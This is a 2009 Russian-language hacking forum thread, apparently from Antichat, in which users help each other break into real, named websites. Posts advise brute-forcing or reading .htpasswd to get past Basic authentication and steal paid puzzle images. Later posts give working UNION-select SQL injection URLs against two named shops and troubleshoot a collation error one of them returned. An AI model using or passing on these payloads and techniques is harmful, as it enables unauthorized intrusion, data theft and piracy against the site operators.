12.10.2009, 16:40
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Что самое интересное, я эту скулю крутил буквально, то ли вчера, то ли позавчера и там на админке была бэйсик авторизация, а сейчас нет  чудеса ёпт  |
|
|
12.10.2009, 18:59
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
С нами:
9466141
Репутация:
74
|
|
А может вообще храниться в другой базе с другим юзером куда прав через попасть через эту скулю нет.Но это как вариант)
|
|
|
|
12.10.2009, 23:09
|
|
Новичок
Регистрация: 02.06.2009
Сообщений: 3
С нами:
8916728
Репутация:
0
|
|
ребя подскажите инфу про сайтик:
http://lenagames.com/astra/jigsaws/
сайт вроде допотопный, вылазит форма авторизации, пробовал скачать сайт и полазить внутри, ничего интересного кроме java скриптов не нашёл, а папка jigsaws без авторизации никак.
В той папке лежат платные картинки для пазлов
Есть прога игра с пазлами, которая региться, а потом отсылает данные по вышеизложенному адресу, а в ответ мне приходит, что-то типа неправильный ключ,
нашёл и поставил ломанную прогу предыдущей версии этих пазлов и посмотрел как она лезет на сайт через Http Analyzer:
GET /astra/jigsaws/aertsen_p_peasants.exe HTTP/1.0
Host: www.lenagames.com
Accept: www/source, text/html, video/mpeg, image/jpeg, image/x-tiff
Accept: image/x-rgb, image/x-xbm, image/gif, */*, application/postscript
From: bj601_download
Content-type: application/x-www-form-urlencoded
"bj601_download" - как я понял это логин
пароль ломанный состоял из 24 символов (символы от A до F и от 0 до 9)
возможен ли метод перебора по моим параметрам или есть способы попроще?
Последний раз редактировалось skyscr; 12.10.2009 в 23:27..
|
|
|
|
12.10.2009, 23:16
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Вот эта папка (в которой платные картинки) стоит по Basic-авторизацией.
|
|
|
|
12.10.2009, 23:42
|
|
Новичок
Регистрация: 02.06.2009
Сообщений: 3
С нами:
8916728
Репутация:
0
|
|
предлагаете брутить?
|
|
|
|
12.10.2009, 23:54
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от skyscr
предлагаете брутить?
Да. Либо еще можно найти уязвимость и прочитать .htpasswd, но я думаю, что там их нету, т.к. сайт на HTML...
|
|
|
|
13.10.2009, 00:50
|
|
Новичок
Регистрация: 02.06.2009
Сообщений: 3
С нами:
8916728
Репутация:
0
|
|
мдя, словарик больше Tb будет, брут не получится
|
|
|
|
13.10.2009, 01:59
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
С нами:
9107354
Репутация:
122
|
|
А как можно вывести рабочие столбцы вот тут?
Код:
http://www.sonyshop.kiev.ua/index.php?t=item_det&id=1361 union select 1,2,3 --
стандартное добаление '-' и изминение значения страницы приводит к ридиректу на страницу 404 |
|
|
|
13.10.2009, 02:21
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
С нами:
9466141
Репутация:
74
|
|
нету полей для вывода...
Код:
http://www.sonyshop.kiev.ua/index.php?t=item_det&id=1361+and+1=0+union+select+1,2,3+--+-
пробуй как слепую покрутить.... |
|
|
|
13.10.2009, 02:29
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
С нами:
9107354
Репутация:
122
|
|
Сообщение от xa-xa89
нету полей для вывода...
Код:
http://www.sonyshop.kiev.ua/index.php?t=item_det&id=1361+and+1=0+union+select+1,2,3+--+-
пробуй как слепую покрутить.... ха, пробовал, не видно)
А вот ещё вопросик. В скуле
Код:
http://trade.polesye.net/catalog.php?catid=2&id=176%20union%20select%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15/*
Выводит вот такое
Код:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
так как первый раз такое вижу, вопрос, что это и как с ним бороться?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
